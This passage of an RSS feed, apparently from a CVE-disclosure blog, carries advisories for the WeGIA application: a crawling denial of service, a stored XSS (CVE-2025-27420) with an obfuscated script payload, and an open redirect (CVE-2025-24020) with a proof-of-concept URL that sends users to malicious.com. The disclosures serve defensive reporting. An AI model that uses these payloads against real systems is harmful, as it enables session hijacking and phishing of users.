&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;https://comfirewall.wegia.org:8000/WeGIA/html/socio/sistema/controller/bower_components/ckeditor/plugins/balloonpanel/skins/moono-lisa/images/hidpi/?C=M;O=D
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;https://comfirewall.wegia.org:8000/WeGIA/html/socio/sistema/controller/bower_components/select2/src/js/select2/data/?C=M;O=D
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This is a Denial of Service vulnerability. Any unauthenticated user with access to tools like OWASP ZAP can exploit this issue to make the server unresponsive. This affects the availability of the application and could disrupt business operations. The lack of rate limiting and recursive crawling restrictions increases the risk and makes the vulnerability exploitable by low-skilled attackers.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-9rp6-4mqp-g4p8&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-9rp6-4mqp-g4p8&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/srafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/sdiego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/snatan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 03 Mar 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-27420</title>
        <link>https://www.cvehunters.com/p/cve-2025-27420/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-27420/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-27420-cross-site-scripting-xss-stored-endpoint-atendido_parentesco_adicionarphp-parameter-descricao&amp;#34;&amp;gt;CVE-2025-27420: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;atendido_parentesco_adicionar.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-27420&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-27420&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;atendido_parentesco_adicionar.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /atendido/atendido_parentesco_adicionar.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-27420-cross-site-scripting-xss-stored-endpoint-atendido_parentesco_adicionarphp-parameter-descricao&amp;#34;&amp;gt;CVE-2025-27420: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;atendido_parentesco_adicionar.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-27420&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-27420&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;atendido_parentesco_adicionar.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /atendido/atendido_parentesco_adicionar.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;atendido_parentesco_adicionar.php&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;top&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;[&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mf&amp;#34;&amp;gt;8680439.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;toString&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;30&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)](&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1337&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-27420/402953284-4f1da611-9de5-417a-9abd-002eec95ac33.png&amp;#34;
	width=&amp;#34;936&amp;#34;
	height=&amp;#34;399&amp;#34;
	srcset=&amp;#34;/p/cve-2025-27420/402953284-4f1da611-9de5-417a-9abd-002eec95ac33_hu_f257ec34f7fabe3a.png 480w, /p/cve-2025-27420/402953284-4f1da611-9de5-417a-9abd-002eec95ac33_hu_e80b786271787925.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;234&amp;#34;
		data-flex-basis=&amp;#34;563px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-27420/402953315-664f0c8f-e1c9-4433-91c8-ea43bd485b08.png&amp;#34;
	width=&amp;#34;1359&amp;#34;
	height=&amp;#34;288&amp;#34;
	srcset=&amp;#34;/p/cve-2025-27420/402953315-664f0c8f-e1c9-4433-91c8-ea43bd485b08_hu_f79aba4239919c00.png 480w, /p/cve-2025-27420/402953315-664f0c8f-e1c9-4433-91c8-ea43bd485b08_hu_906450cb81c80b4f.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;471&amp;#34;
		data-flex-basis=&amp;#34;1132px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-x3wr-75qx-55cw&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-ffcg-qr75-98mg&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 03 Mar 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-24020</title>
        <link>https://www.cvehunters.com/p/cve-2025-24020/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-24020/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-24020-url-redirection-to-untrusted-site-open-redirect-in-wegia&amp;#34;&amp;gt;CVE-2025-24020: URL Redirection to Untrusted Site (&amp;lt;code&amp;gt;Open Redirect&amp;lt;/code&amp;gt;) in WeGIA
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-24020&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-24020&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;An Open Redirect vulnerability was identified in the &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; endpoint of the Wegia application. The vulnerability allows the &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; parameter to be manipulated, redirecting authenticated users to arbitrary external URLs without validation. Unauthenticated users will see the message: &amp;lt;strong&amp;gt;&amp;#34;Operação negada: Cliente não autorizado&amp;#34;&amp;lt;/strong&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The issue stems from the lack of validation for the &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; parameter, which accepts external URLs as redirection destinations. This vulnerability can be exploited to perform phishing attacks or redirect users to malicious websites.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-24020-url-redirection-to-untrusted-site-open-redirect-in-wegia&amp;#34;&amp;gt;CVE-2025-24020: URL Redirection to Untrusted Site (&amp;lt;code&amp;gt;Open Redirect&amp;lt;/code&amp;gt;) in WeGIA
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-24020&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-24020&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;An Open Redirect vulnerability was identified in the &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; endpoint of the Wegia application. The vulnerability allows the &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; parameter to be manipulated, redirecting authenticated users to arbitrary external URLs without validation. Unauthenticated users will see the message: &amp;lt;strong&amp;gt;&amp;#34;Operação negada: Cliente não autorizado&amp;#34;&amp;lt;/strong&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The issue stems from the lack of validation for the &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; parameter, which accepts external URLs as redirection destinations. This vulnerability can be exploited to perform phishing attacks or redirect users to malicious websites.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;https://comfirewall.wegia.org:8000/WeGIA/controle/control.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ol type=&amp;#34;1&amp;#34;&amp;gt;
    &amp;lt;li&amp;gt;Log in to the application.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Access the following URL: &amp;lt;code&amp;gt;https://comfirewall.wegia.org:8000/WeGIA/controle/control.php?metodo=listarTodos&amp;amp;nomeClasse=FuncionarioControle&amp;amp;nextPage=https://malicious.com&amp;lt;/code&amp;gt;.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;The authenticated user will be redirected to &amp;lt;code&amp;gt;https://malicious.com&amp;lt;/code&amp;gt;.&amp;lt;/li&amp;gt;
  &amp;lt;/ol&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;video width=&amp;#34;100%&amp;#34; height=&amp;#34;100%&amp;#34; controls&amp;gt;
  &amp;lt;source src=&amp;#34;403920253-29492e5a-3047-4c82-965c-02ffdcf8d649.mp4&amp;#34; type=&amp;#34;video/mp4&amp;#34;&amp;gt;
&amp;lt;/video&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; This vulnerability allows:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Phishing: Attackers can redirect authenticated users to fake login pages.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malware Distribution: Users can be directed to sites hosting malicious content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputation Damage: The trust in the Wegia domain can be harmed.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-27g8-5q48-xmw6&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-27g8-5q48-xmw6&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
